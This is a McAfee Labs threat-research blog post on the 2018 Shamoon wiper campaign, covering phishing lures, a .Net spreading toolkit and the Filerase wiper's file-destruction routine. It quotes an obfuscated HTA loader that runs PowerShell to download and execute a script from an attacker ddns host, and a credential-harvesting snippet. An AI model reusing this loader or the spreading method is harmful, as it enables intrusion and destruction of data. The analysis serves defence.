{"id":93278,"date":"2018-12-19T13:45:13","date_gmt":"2018-12-19T21:45:13","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=93278"},"modified":"2024-02-19T22:05:55","modified_gmt":"2024-02-20T06:05:55","slug":"shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","title":{"rendered":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems"},"content":{"rendered":"<p>Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in the Middle East and Europe. In that <a href=\"https:\/\/securingtomorrow.mcafee.com\/other-blogs\/mcafee-labs\/shamoon-returns-to-wipe-systems-in-middle-east-europe\/\">analysis<\/a> we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.<\/p>\n<p>After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33\u2014or a group masquerading as APT33\u2014is likely responsible for these attacks.<\/p>\n<p>In the Shamoon attacks of 2016\u20132017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by <a href=\"https:\/\/www.symantec.com\/blogs\/threat-intelligence\/shamoon-destructive-threat-re-emerges-new-sting-its-tail\">Symantec<\/a>.<\/p>\n<p>These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:<\/p>\n<ul>\n<li><strong>OCLC.exe:<\/strong> Used to read a list of targeted computers created by the attackers. This tool is responsible to run the second tool, spreader.exe, with the list of each targeted machine.<\/li>\n<\/ul>\n<ul>\n<li><strong>Spreader.exe:<\/strong> Used to spread the file eraser in each machine previously set. It also gets information about the OS version.<\/li>\n<\/ul>\n<ul>\n<li><strong>SpreaderPsexec.exe:<\/strong> Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.<\/li>\n<\/ul>\n<ul>\n<li><strong>SlHost.exe:<\/strong> The new wiper, which browses the targeted system and deletes every file.<\/li>\n<\/ul>\n<p>The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.<\/p>\n<p>This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.<\/p>\n<h2>Geopolitical context<\/h2>\n<p>The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.<\/p>\n<p>Inside the .Net wiper, we discovered the following ASCII art:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-93281 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-1024x563.png\" alt=\"\" width=\"1024\" height=\"563\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-1024x563.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-300x165.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-768x422.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-910x500.png 910w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1.png 1247w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p>These characters resemble the Arabic text \u062a\u064e\u0628\u0651\u064e\u062a\u0652 \u064a\u064e\u062f\u064e\u0627 \u0623\u064e\u0628\u0650\u064a \u0644\u064e\u0647\u064e\u0628\u064d \u0648\u064e\u062a\u064e\u0628\u0651\u064e. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means \u201cperish the hands of the Father of flame\u201d or \u201cthe power of Abu Lahab will perish, and he will perish.\u201d What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?<\/p>\n<h2>Overview of the attack<\/h2>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-93282 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-796x1024.png\" alt=\"\" width=\"796\" height=\"1024\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-796x1024.png 796w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-233x300.png 233w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-768x987.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-389x500.png 389w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2.png 1127w\" sizes=\"auto, (max-width: 796px) 100vw, 796px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93311\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png\" alt=\"\" width=\"753\" height=\"216\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png 753w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1-300x86.png 300w\" sizes=\"auto, (max-width: 753px) 100vw, 753px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<h2>How did the malware get onto the victim\u2019s network?<\/h2>\n<p>We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:<\/p>\n<ul>\n<li>Hxxp:\/\/possibletarget.ddns.com:880\/JobOffering.<\/li>\n<\/ul>\n<p>Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.<\/p>\n<p>A code example from one malicious HTML application file:<\/p>\n<p style=\"padding-left: 30px;\"><em>YjDrMeQhBOsJZ = &#8220;WS&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>wcpRKUHoZNcZpzPzhnJw = &#8220;crip&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>RulsTzxTrzYD = &#8220;t.Sh&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>MPETWYrrRvxsCx = &#8220;ell&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>ULRXZmHsCORQNoLHPxW = &#8220;cm&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>zhKokjoiBdFhTLiGUQD = &#8220;d.e&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlpnUicmMHtWdpkRwmXeQN = &#8220;xe&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlpnUicmMHtWdp = &#8220;.&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlicmMHtWdp = &#8220;(&#8216;http:\/\/mynetwork.ddns.net:880\/*****.ps1&#8217;)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA.run(&#8216;%windir%\\\\System32\\\\&#8217; + FKeRGlzVvDMH + &#8216; \/c powershell -w 1 IEX (New-Object Net.WebClient)&#8217;+KoORGlpnUicmMHtWdp+&#8217;downloadstring&#8217;+KoORGlicmMHtWdp)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA.run(&#8216;%windir%\\\\System32\\\\&#8217; + FKeRGlzVvDMH + &#8216; \/c powershell -window hidden -enc<\/em><\/p>\n<p>The preceding script opens a command shell on the victim\u2019s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.<\/p>\n<p>We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:<\/p>\n<p style=\"padding-left: 30px;\"><em>function primer {<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>if ($env:username -eq &#8220;$($env:computername)$&#8221;){$u=&#8221;NT AUTHORITY\\SYSTEM&#8221;}else{$u=$env:username}<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$o=&#8221;$env:userdomain\\$u<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$env:computername<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$env:PROCESSOR_ARCHITECTURE<\/em><\/p>\n<p>With legitimate credentials to a network it is easy to login and spread the wipers.<\/p>\n<h2>.Net tool kit<\/h2>\n<p>The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.<\/p>\n<h3><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93284\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png\" alt=\"\" width=\"988\" height=\"368\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4-300x112.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4-768x286.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/h3>\n<p>This first component (OCLC.exe) reads two text files stored in two local directories. Directories \u201cshutter\u201d and \u201clight\u201d contain a list of targeted machines.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93285\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png\" alt=\"\" width=\"596\" height=\"403\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png 596w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5-300x203.png 300w\" sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/a><\/p>\n<p>OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93286\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png\" alt=\"\" width=\"694\" height=\"172\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png 694w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6-300x74.png 300w\" sizes=\"auto, (max-width: 694px) 100vw, 694px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93287\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png\" alt=\"\" width=\"988\" height=\"335\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7-300x102.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7-768x260.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93288\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png\" alt=\"\" width=\"809\" height=\"165\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png 809w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8-300x61.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8-768x157.png 768w\" sizes=\"auto, (max-width: 809px) 100vw, 809px\" \/><\/a><\/p>\n<p>The spreader places the executable files (Shamoon and Filerase) into the folder Net2.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93289\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png\" alt=\"\" width=\"628\" height=\"191\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png 628w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9-300x91.png 300w\" sizes=\"auto, (max-width: 628px) 100vw, 628px\" \/><\/a><\/p>\n<p>It creates a folder on remote computers: C:\\\\Windows\\System32\\Program Files\\Internet Explorer\\Signing.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93290\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png\" alt=\"\" width=\"785\" height=\"186\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png 785w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10-300x71.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10-768x182.png 768w\" sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/a><\/p>\n<p>The spreader copies the executables into that directory.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93291\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png\" alt=\"\" width=\"887\" height=\"120\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png 887w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11-300x41.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11-768x104.png 768w\" sizes=\"auto, (max-width: 887px) 100vw, 887px\" \/><\/a><\/p>\n<p>It runs the executables on the remote machine by creating a batch file in the administrative share \\\\RemoteMachine\\admin$\\\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.<\/p>\n<p>If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.<\/p>\n<p>The following screenshot shows the \u201cexecute\u201d function:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93292\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png\" alt=\"\" width=\"868\" height=\"356\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png 868w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12-300x123.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12-768x315.png 768w\" sizes=\"auto, (max-width: 868px) 100vw, 868px\" \/><\/a><\/p>\n<p>If the executable files are not present in the folder Net2, it checks the folders \u201call\u201d and Net4.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93293\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png\" alt=\"\" width=\"811\" height=\"422\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png 811w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13-300x156.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13-768x400.png 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><\/a><\/p>\n<p>To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93294\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png\" alt=\"\" width=\"988\" height=\"303\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14-300x92.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14-768x236.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93295\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png\" alt=\"\" width=\"779\" height=\"67\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png 779w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15-300x26.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15-768x66.png 768w\" sizes=\"auto, (max-width: 779px) 100vw, 779px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93296\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png\" alt=\"\" width=\"988\" height=\"335\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16-300x102.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16-768x260.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The wiper contains three options:<\/p>\n<ul>\n<li>SilentMode: Runs the wiper without any output.<\/li>\n<li>BypassAcl: Escalates privileges. It is always enabled.<\/li>\n<li>PrintStackTrace: Tracks the number of folders and files erased.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93297\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png\" alt=\"\" width=\"562\" height=\"402\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png 562w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17-300x215.png 300w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><\/a><\/p>\n<p>The BypassAcl option is always \u201ctrue\u201d even if the option is not specified. It enables <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/desktop\/secauthz\/privilege-constants\">the following privileges<\/a>:<\/p>\n<ul>\n<li>SeBackupPrivilege<\/li>\n<li>SeRestorePrivilege<\/li>\n<li>SeTakeOwnershipPrivilege<\/li>\n<li>SeSecurityPrivilege<\/li>\n<\/ul>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93298\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png\" alt=\"\" width=\"347\" height=\"123\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png 347w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18-300x106.png 300w\" sizes=\"auto, (max-width: 347px) 100vw, 347px\" \/><\/a><\/p>\n<p>To find a file to erase, the malware uses function GetFullPath to get all paths.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93299\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png\" alt=\"\" width=\"829\" height=\"153\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png 829w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19-300x55.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19-768x142.png 768w\" sizes=\"auto, (max-width: 829px) 100vw, 829px\" \/><\/a><\/p>\n<p>It erases each folder and file.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93300\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png\" alt=\"\" width=\"665\" height=\"72\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png 665w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20-300x32.png 300w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><\/a><\/p>\n<p>The malware browses every file in every folder on the system.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93301\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png\" alt=\"\" width=\"1010\" height=\"231\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png 1010w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21-300x69.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21-768x176.png 768w\" sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/a><\/p>\n<p>To erase all files and folders, it first removes the \u201cread only\u2019 attributes to overwrite them.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93302\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png\" alt=\"\" width=\"610\" height=\"107\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png 610w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22-300x53.png 300w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p>It changes the creation, write, and access date and time to 01\/01\/3000 at 12:01:01 for each file.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93303\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png\" alt=\"\" width=\"471\" height=\"197\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png 471w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23-300x125.png 300w\" sizes=\"auto, (max-width: 471px) 100vw, 471px\" \/><\/a><\/p>\n<p>The malware rewrites each file two times with random strings.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93304\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png\" alt=\"\" width=\"461\" height=\"527\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png 461w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24-262x300.png 262w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24-437x500.png 437w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/a><\/p>\n<p>It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.<\/p>\n<p>Then it uses FILE_DISPOSITION_INFORMATION to delete the files.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93305\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png\" alt=\"\" width=\"670\" height=\"146\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png 670w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25-300x65.png 300w\" sizes=\"auto, (max-width: 670px) 100vw, 670px\" \/><\/a><\/p>\n<p>The function ProcessTracker has been coded to track the destruction.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93306\" 